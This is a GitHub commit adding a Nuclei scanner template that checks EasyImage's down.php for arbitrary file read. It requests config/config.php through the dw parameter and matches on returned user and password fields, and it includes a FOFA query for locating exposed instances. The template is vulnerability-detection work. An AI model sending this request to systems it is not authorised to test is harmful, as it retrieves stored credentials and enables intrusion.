Merge pull request #7856 from projectdiscovery/easyimage-downphp-lfi

Create easyimage-downphp-lfi.yaml
patch-1
pussycat0x 2023-08-07 19:56:43 +05:30 committed by GitHub
commit 23d6e469e4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: easyimage-downphp-lfi
info:
name: EasyImage down.php - Arbitrary File Read
author: DhiyaneshDk
severity: high
reference:
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go
metadata:
max-request: 1
verified: true
fofa-query: app="EasyImage-简单图床"
tags: easyimage,lfi,exposure,config
http:
- method: GET
path:
- "{{BaseURL}}/application/down.php?dw=config/config.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'user'=>"
- "'password'=>"
- "EasyImage"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200